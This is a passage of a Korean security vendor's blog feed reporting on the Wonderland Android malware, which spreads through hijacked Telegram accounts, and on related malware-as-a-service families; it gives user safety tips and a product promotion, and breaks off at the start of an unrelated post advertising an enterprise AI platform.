&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;Wonderland는 단순 SMS 스틸러가 아닙니다. 양방향 C2(Command &amp;amp; Control) 통신을 통해 공격자가 실시간으로 명령을 내릴 수 있으며, 다음과 같은 기능을 수행합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;804&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b1xLBm/dJMcacItVhS/XklZRO26cqktb3gaerSL90/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b1xLBm/dJMcacItVhS/XklZRO26cqktb3gaerSL90/img.png&quot; data-alt=&quot;[이미지 출처] The HackerNews&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b1xLBm/dJMcacItVhS/XklZRO26cqktb3gaerSL90/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb1xLBm%2FdJMcacItVhS%2FXklZRO26cqktb3gaerSL90%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1280&quot; height=&quot;804&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;804&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지 출처] The HackerNews&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: circle;&quot; data-ke-list-type=&quot;circle&quot;&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;SMS 및 OTP(일회용 비밀번호) 가로채기&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;USSD 명령 실행&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연락처&amp;middot;전화번호 탈취&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;알림 숨김(보안&amp;middot;OTP 알림 차단)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;감염 기기를 이용한 추가 SMS 발송(측면 확산)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이를 통해 공격자는 금융 인증 절차를 실시간으로 우회하며 자금을 탈취할 수 있고, 감염된 기기를 또 다른 공격 거점으로 활용할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #1b711d;&quot;&gt;&lt;b&gt;텔레그램 기반 &amp;lsquo;무한 증식&amp;rsquo; 구조로 계정 탈취 &amp;rarr; 재유포&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;872&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bSyrFL/dJMcagjNq87/r1C82kd1aby32nCJKDdOlk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bSyrFL/dJMcagjNq87/r1C82kd1aby32nCJKDdOlk/img.png&quot; data-alt=&quot;[이미지 출처] Group-IB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bSyrFL/dJMcagjNq87/r1C82kd1aby32nCJKDdOlk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbSyrFL%2FdJMcagjNq87%2Fr1C82kd1aby32nCJKDdOlk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1280&quot; height=&quot;872&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;872&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지 출처] Group-IB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;Wonderland 공격 조직(TrickyWonders)은 텔레그램을 핵심 인프라로 활용합니다. 악성 앱이 설치된 이후 사용자가 권한을 허용하면, 공격자는 해당 기기의 전화번호를 이용해 텔레그램 계정을 탈취하고, 해당 계정의 대화 목록&amp;middot;연락처를 대상으로 악성 APK를 재유포합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이 과정이 반복되며 감염은 순환 구조(cyclical infection chain)로 확산되고, 실제로 다크웹에서는 탈취된 텔레그램 세션이 유통되며 공격에 활용되고 있는 것으로 확인됐습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;&lt;b&gt;드로퍼&amp;middot;RAT&amp;middot;MaaS 결합 - 안드로이드 악성코드의 &amp;lsquo;플랫폼화&amp;rsquo; 가속&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;Wonderland는 단일 사례가 아닙니다. 최근에는 Cellik, Frogblight, NexusRoute 등 기능이 고도화된 안드로이드 악성코드 패밀리들이 잇따라 등장하고 있습니다. 이들의 공통점은 다음과 같습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: circle;&quot; data-ke-list-type=&quot;circle&quot;&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;드로퍼 기반 위장 설치 구조&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;실시간 화면 스트리밍, 키로깅, 카메라&amp;middot;마이크 접근&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;OTP&amp;middot;결제 정보 탈취&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;u&gt;Malware-as-a-Service(MaaS)&lt;/u&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;형태의 서비스 모델&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;특히 Cellik의 경우, 공격자가 Google Play의 정상 앱을 선택해 악성 페이로드를 자동으로 결합하는&lt;u&gt; &amp;lsquo;원클릭 APK 빌더&amp;rsquo;&lt;/u&gt; 기능까지 제공하고 있어, 기술력이 낮은 공격자도 대규모 공격을 손쉽게 실행할 수 있는 환경이 만들어지고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #1b711d;&quot;&gt;&lt;b&gt;보안 전문가 경고 - '개별 공격에서 범죄 비즈니스로 전환'&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안 업계는 이러한 흐름이 단순한 공격 기법의 진화가 아니라, 안드로이드 해킹이 완전히 &amp;lsquo;플랫폼화된 범죄 비즈니스&amp;rsquo;로 전환됐음을 보여주는 신호라고 분석합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;드로퍼 기술과 실시간 RAT 기능의 결합은 기존의 정적 필터링&amp;middot;서명 기반 보안 체계를 무력화하며, 공격 인프라는 빠르게 교체되는 도메인과 빌드 단위 C2 구조로 운영돼 차단 또한 점점 어려워지고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #1b711d;&quot;&gt;&lt;b&gt;사용자 주의사항: 설치 경로와 &amp;lsquo;접근성 권한&amp;rsquo;이 핵심&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이와 같은 공격의 대부분은 &lt;u&gt;사용자의 설정 변경과 권한 허용&lt;/u&gt;에서 시작됩니다. 특히 다음 사항에 각별한 주의가 필요합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;출처가 불분명한 APK 파일 설치 지양&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;'업데이트 필요' 메시지를 통한 알 수 없는 앱 설치 요구 주의&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;접근성 서비스 권한을 요구하는 앱은 설치 즉시 점검&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;문자&amp;middot;메신저를 통한 앱 설치 링크 클릭 금지&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안 알림이 갑자기 사라지거나 OTP 문자가 보이지 않을 경우 즉시 점검&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;Wonderland를 비롯한 최신 안드로이드 악성코드는 더 이상 단순한 스팸이나 정보 탈취 수단이 아니라, 실시간 제어&amp;middot;확산&amp;middot;금융 사기를 동시에 수행하는 통합 공격 플랫폼으로 진화하고 있습니다. 이런 변화는 모바일 보안 역시 단편적인 대응이 아닌, 지속적인 위협 모니터링과 다계층 대응 체계로 전환이 필요함을 시사합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt; &lt;i&gt; Plus Tip!&lt;/i&gt; &lt;/span&gt;&lt;/b&gt;모바일 보안, 이렇게 시작해보세요!&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이스트시큐리티는 고도화되는 모바일 위협 환경에 대응하기 위해 최신 악성코드 동향을 지속적으로 분석하고, 사용자 보호를 위한 보안 기술 고도화를 이어가고 있습니다. &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이러한 환경에서 &lt;b&gt;&lt;a href=&quot;https://bit.ly/4olZwSW&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;알약 모바일 앱&lt;/a&gt;&lt;/b&gt;은 악성 앱 설치나 스미싱 메시지로 시작되는 위험 신호를 사전에 인지하고 점검할 수 있도록 돕는 기본적인 모바일 보안 관리 수단으로 활용할 수 있습니다. 일상적인 스마트폰 사용 중에도 작은 이상 징후를 놓치지 않고 확인하는 습관이 모바일 위협을 예방하는 첫 단계가 됩니다. 지금, 알약 모바일을 통해 내 스마트폰의 보안 상태를 간단하게 점검해 보시기 바랍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384072.png&quot; data-origin-width=&quot;474&quot; data-origin-height=&quot;154&quot;&gt;&lt;a href=&quot;https://bit.ly/4olZwSW&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Dz7JU/dJMcaaRqtib/rE0kEslE6RLa9erGXGTkck/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FDz7JU%2FdJMcaaRqtib%2FrE0kEslE6RLa9erGXGTkck%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;300&quot; height=&quot;97&quot; data-filename=&quot;Group 2034384072.png&quot; data-origin-width=&quot;474&quot; data-origin-height=&quot;154&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #666666;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;[참고 출처]&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;​Group-IB, &lt;a href=&quot;https://www.facebook.com/groupibHQ/photos/android-malware-campaigns-in-uzbekistan-have-entered-a-new-phase-of-operational-/1336223978309868/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&amp;lt;Android malware campaigns in Uzbekistan &amp;ndash; Wonderland/TrickyWonders&amp;gt; &lt;/a&gt;(2025-12-19)&lt;/li&gt;
&lt;li&gt;The Hacker News, &lt;a href=&quot;https://thehackernews.com/2025/12/android-malware-operations-merge.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&amp;lt;Android Malware Operations Merge Droppers, SMS Theft, and RAT Control&amp;gt;&lt;/a&gt;(2025-12-21)&lt;/li&gt;
&lt;li&gt;ImPreza Host, &lt;a href=&quot;https://impreza.host/from-trojan-apks-to-stealthy-droppers-wonderland-android-malware-evolves/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&amp;lt;From Trojan APKs to Stealthy Droppers: Wonderland Android Malware Evolves&amp;gt;​&lt;/a&gt; (2025-12-21)&lt;/li&gt;
&lt;li&gt;Varutra / Tech, &lt;a href=&quot;https://www.varutra.com/ctp/threatpost/postDetails/Cellik-Android-Malware-Turns-Trusted-Google-Play-Apps-into-Stealthy-Trojanized-Threats/VHNRZmJObkhaRDd2WFZNZ3FlaTlLdz09&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&amp;lt;Cellik Android Malware Turns Trusted Google Play Apps into Stealthy Trojanized Threats&amp;gt;​&lt;/a&gt; &amp;nbsp;(2025-12-17)&lt;/li&gt;
&lt;/ul&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>wonderland</category>
      <category>모바일보안</category>
      <category>보안동향</category>
      <category>스마트폰보안</category>
      <category>악성코드</category>
      <category>안드로이드</category>
      <category>안드로이드보안</category>
      <category>원더랜드</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5693</guid>
      <comments>https://alyacofficialblog.tistory.com/5693#entry5693comment</comments>
      <pubDate>Wed, 24 Dec 2025 08:00:00 +0900</pubDate>
    </item>
    <item>
      <title>보안 솔루션 도입 시, 기업용 AI 플랫폼 &amp;lsquo;Alan Works&amp;rsquo; 계정 무료 제공!</title>
      <link>https://alyacofficialblog.tistory.com/5692</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안과 AI 활용이 더 이상 선택이 아닌 필수가 된 지금, 기업 업무 환경에도 &amp;lsquo;안전한 생성형 AI 활용&amp;rsquo;에 대한 기준이 필요해지고 있습니다. 이러한 흐름에 맞춰 이스트시큐리티는 &lt;u&gt;&lt;b&gt;기업 보안 솔루션 도입 고객&lt;/b&gt;을 대상&lt;/u&gt;으로, 안전한 &lt;b&gt;기업용 멀티 LLM 플랫폼 &lt;u&gt;&amp;lsquo;Alan Works&amp;rsquo;&lt;/u&gt; 계정 무료 제공&lt;/b&gt; 프로모션을 진행합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이번 프로모션은 단순한 부가 혜택이 아닌, 보안과 AI 혁신을 동시에 경험할 수 있는 기회라는 점에서 주목할 만합니다. 특별한 이번 기회, 놓치지 말고 지금 자세한 내용을 확인해 주세요!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;01_Title 1.png&quot; data-origin-width=&quot;1260&quot; data-origin-height=&quot;1812&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b3hYqF/dJMcahJMM7e/PIraOQYuo3lpXP0ldZML31/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b3hYqF/dJMcahJMM7e/PIraOQYuo3lpXP0ldZML31/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b3hYqF/dJMcahJMM7e/PIraOQYuo3lpXP0ldZML31/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb3hYqF%2FdJMcahJMM7e%2FPIraOQYuo3lpXP0ldZML31%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1260&quot; height=&quot;1812&quot; data-filename=&quot;01_Title 1.png&quot; data-origin-width=&quot;1260&quot; 